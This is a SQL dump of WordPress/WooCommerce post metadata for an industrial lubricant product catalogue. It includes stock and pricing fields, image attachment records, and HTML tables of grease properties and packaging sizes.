INSERT INTO `wp_postmeta` VALUES (5956, 708, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5957, 708, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (5958, 708, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5959, 708, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5960, 708, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (5961, 708, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5962, 708, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5963, 708, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (5964, 708, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5965, 708, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5966, 708, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (5967, 708, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (5968, 708, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (5999, 708, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (6000, 708, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (6001, 709, '_wp_attached_file', '2016/08/shutterstock_76083631.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6002, 709, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3019;s:6:"height";i:3100;s:4:"file";s:33:"2016/08/shutterstock_76083631.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"shutterstock_76083631-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"shutterstock_76083631-779x800.jpg";s:5:"width";i:779;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"shutterstock_76083631-768x789.jpg";s:5:"width";i:768;s:6:"height";i:789;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"shutterstock_76083631-1558x1600.jpg";s:5:"width";i:1558;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_76083631-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_76083631-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"shutterstock_76083631-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"shutterstock_76083631-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:56;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6005, 711, '_wp_attached_file', '2016/08/shutterstock_205346470.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6006, 711, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5760;s:6:"height";i:3840;s:4:"file";s:34:"2016/08/shutterstock_205346470.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_205346470-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_205346470-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_205346470-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_205346470-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_205346470-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_205346470-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_205346470-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_205346470-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6007, 712, '_wp_attached_file', '2016/08/shutterstock_354196970.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6008, 712, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2468;s:6:"height";i:1643;s:4:"file";s:34:"2016/08/shutterstock_354196970.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_354196970-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_354196970-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_354196970-768x511.jpg";s:5:"width";i:768;s:6:"height";i:511;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_354196970-1600x1065.jpg";s:5:"width";i:1600;s:6:"height";i:1065;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_354196970-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_354196970-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_354196970-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_354196970-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6009, 713, '_edit_lock', '1475695223:2'); 
INSERT INTO `wp_postmeta` VALUES (6010, 713, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (6011, 713, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (6012, 713, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (6013, 713, '312_default_editor', '<table width="426">\r\n<tbody>\r\n<tr>\r\n<td width="202">Property</td>\r\n<td style="text-align: center;" width="224">AUT Series</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td style="text-align: center;">White, Creamy</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range °C</td>\r\n<td style="text-align: center;">(-44-200)</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range °F</td>\r\n<td style="text-align: center;">(-46-392)</td>\r\n</tr>\r\n<tr>\r\n<td>Base Oil Viscosity @20°C cSt</td>\r\n<td style="text-align: center;">310</td>\r\n</tr>\r\n<tr>\r\n<td>Base Oil Viscosity @40°C cSt</td>\r\n<td style="text-align: center;">100</td>\r\n</tr>\r\n<tr>\r\n<td>Base Oil Viscosity @100°C cSt</td>\r\n<td style="text-align: center;">12.5</td>\r\n</tr>\r\n<tr>\r\n<td>NLGI Grade</td>\r\n<td style="text-align: center;">2</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Gravity</td>\r\n<td style="text-align: center;">2 g/cm</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (6014, 713, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Syringe</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Pail</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td width="125">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (6015, 713, '318_custom_list_file', 'a:1:{s:32:"2d17dd6fef7dbeedc1eeead1ddfc8b5b";a:3:{s:4:"name";s:14:"Automotive PDF";s:4:"file";s:79:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Automotive-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (6016, 713, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (6017, 713, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (6018, 713, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6019, 713, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6020, 713, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (6021, 713, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6022, 713, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (6023, 713, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (6024, 713, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (6025, 713, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (6026, 713, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (6027, 713, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6028, 713, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6029, 713, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6030, 713, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (6031, 713, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (6032, 713, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6033, 713, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (6034, 713, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6035, 713, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6036, 713, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (6037, 713, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6038, 713, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6039, 713, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (6040, 713, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6041, 713, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6042, 713, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (6043, 713, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (6044, 713, '_product_image_gallery', '380,379,378,377,376,375,374'); 
INSERT INTO `wp_postmeta` VALUES (6045, 713, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (6046, 713, '_thumbnail_id', '694'); 
INSERT INTO `wp_postmeta` VALUES (6047, 714, '_edit_lock', '1475695381:2'); 
INSERT INTO `wp_postmeta` VALUES (6048, 714, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (6049, 714, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (6050, 714, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (6051, 714, '312_default_editor', '<table width="426">\r\n<tbody>\r\n<tr>\r\n<td width="202">Property</td>\r\n<td style="text-align: center;" width="224">AUT Series</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td style="text-align: center;">White, Creamy</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range °C</td>\r\n<td style="text-align: center;">(-44-200)</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range °F</td>\r\n<td style="text-align: center;">(-46-392)</td>\r\n</tr>\r\n<tr>\r\n<td>Base Oil Viscosity @20°C cSt</td>\r\n<td style="text-align: center;">310</td>\r\n</tr>\r\n<tr>\r\n<td>Base Oil Viscosity @40°C cSt</td>\r\n<td style="text-align: center;">100</td>\r\n</tr>\r\n<tr>\r\n<td>Base Oil Viscosity @100°C cSt</td>\r\n<td style="text-align: center;">12.5</td>\r\n</tr>\r\n<tr>\r\n<td>NLGI Grade</td>\r\n<td style="text-align: center;">2</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Gravity</td>\r\n<td style="text-align: center;">2 g/cm</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (6052, 714, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Syringe</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Pail</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td width="125">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (6053, 714, '318_custom_list_file', 'a:1:{s:32:"2d17dd6fef7dbeedc1eeead1ddfc8b5b";a:3:{s:4:"name";s:14:"Automotive PDF";s:4:"file";s:79:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Automotive-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (6054, 714, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (6055, 714, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6056, 714, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6057, 714, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (6058, 714, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6059, 714, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (6060, 714, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (6061, 714, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (6062, 714, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (6063, 714, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6064, 714, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6065, 714, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6066, 714, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (6067, 714, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (6068, 714, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6069, 714, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (6070, 714, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6071, 714, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6072, 714, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (6073, 714, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6074, 714, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6075, 714, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (6076, 714, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6077, 714, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6078, 714, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (6079, 714, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (6080, 714, '_product_image_gallery', '380,379,378,377,376,375,374'); 
INSERT INTO `wp_postmeta` VALUES (6110, 714, '_thumbnail_id', '693'); 
INSERT INTO `wp_postmeta` VALUES (6111, 714, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (6112, 714, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (6113, 715, '_edit_lock', '1475697203:2'); 
INSERT INTO `wp_postmeta` VALUES (6114, 715, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (6115, 715, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (6116, 715, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (6117, 715, '312_default_editor', '<table width="426">\r\n<tbody>\r\n<tr>\r\n<td width="202">Property</td>\r\n<td style="text-align: center;" width="224">AUT Series</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td style="text-align: center;">White, Creamy</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range °C</td>\r\n<td style="text-align: center;">(-44-200)</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range °F</td>\r\n<td style="text-align: center;">(-46-392)</td>\r\n</tr>\r\n<tr>\r\n<td>Base Oil Viscosity @20°C cSt</td>\r\n<td style="text-align: center;">310</td>\r\n</tr>\r\n<tr>\r\n<td>Base Oil Viscosity @40°C cSt</td>\r\n<td style="text-align: center;">100</td>\r\n</tr>\r\n<tr>\r\n<td>Base Oil Viscosity @100°C cSt</td>\r\n<td style="text-align: center;">12.5</td>\r\n</tr>\r\n<tr>\r\n<td>NLGI Grade</td>\r\n<td style="text-align: center;">2</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Gravity</td>\r\n<td style="text-align: center;">2 g/cm</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (6118, 715, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Syringe</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Pail</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td width="125">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (6119, 715, '318_custom_list_file', 'a:1:{s:32:"2d17dd6fef7dbeedc1eeead1ddfc8b5b";a:3:{s:4:"name";s:14:"Automotive PDF";s:4:"file";s:79:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Automotive-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (6120, 715, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (6121, 715, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6122, 715, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6123, 715, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (6124, 715, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6125, 715, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (6126, 715, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (6127, 715, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (6128, 715, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (6129, 715, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6130, 715, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6131, 715, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6132, 715, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (6133, 715, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (6134, 715, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6135, 715, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (6136, 715, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6137, 715, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6138, 715, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (6139, 715, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6140, 715, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6141, 715, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (6142, 715, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6143, 715, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6144, 715, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (6145, 715, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (6146, 715, '_product_image_gallery', '380,379,378,377,376,375,374'); 
INSERT INTO `wp_postmeta` VALUES (6176, 715, '_thumbnail_id', '686'); 
INSERT INTO `wp_postmeta` VALUES (6177, 715, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (6178, 715, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (6179, 642, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (6180, 716, '_edit_lock', '1496846026:2'); 
INSERT INTO `wp_postmeta` VALUES (6181, 716, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (6182, 716, '_ywtm_tab_type', 'global'); 
INSERT INTO `wp_postmeta` VALUES (6183, 716, '_ywtm_show_tab', '1'); 
INSERT INTO `wp_postmeta` VALUES (6184, 716, '_ywtm_order_tab', '6'); 
INSERT INTO `wp_postmeta` VALUES (6185, 716, '_ywtm_icon_tab', 'a:3:{s:6:"select";s:4:"icon";s:4:"icon";s:16:"FontAwesome:star";s:6:"custom";s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (6186, 716, '_ywtm_layout_type', 'default'); 
INSERT INTO `wp_postmeta` VALUES (6187, 716, '_ywtm_enable_custom_content', '0'); 
INSERT INTO `wp_postmeta` VALUES (6188, 716, '_ywtm_gallery_columns', '1'); 
INSERT INTO `wp_postmeta` VALUES (6189, 716, '_ywtm_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (6190, 716, '_ywtm_video', 'a:1:{s:7:"columns";s:1:"1";}'); 
INSERT INTO `wp_postmeta` VALUES (6191, 716, '_ywtm_google_map_full_width', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (6192, 716, '_ywtm_google_map_width', '100'); 
INSERT INTO `wp_postmeta` VALUES (6193, 716, '_ywtm_google_map_height', '100'); 
INSERT INTO `wp_postmeta` VALUES (6194, 716, '_ywtm_google_map_overlay_address', ''); 
INSERT INTO `wp_postmeta` VALUES (6195, 716, '_ywtm_google_map_overlay_zoom', '15'); 
INSERT INTO `wp_postmeta` VALUES (6196, 716, '_ywtm_text_tab', ''); 
INSERT INTO `wp_postmeta` VALUES (6197, 716, '_ywtm_shortcode_tab', ''); 
INSERT INTO `wp_postmeta` VALUES (6198, 581, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (6199, 717, '_edit_lock', '1475696681:2'); 
INSERT INTO `wp_postmeta` VALUES (6200, 717, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (6201, 717, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (6202, 717, '_stock_status', 'instock'); 
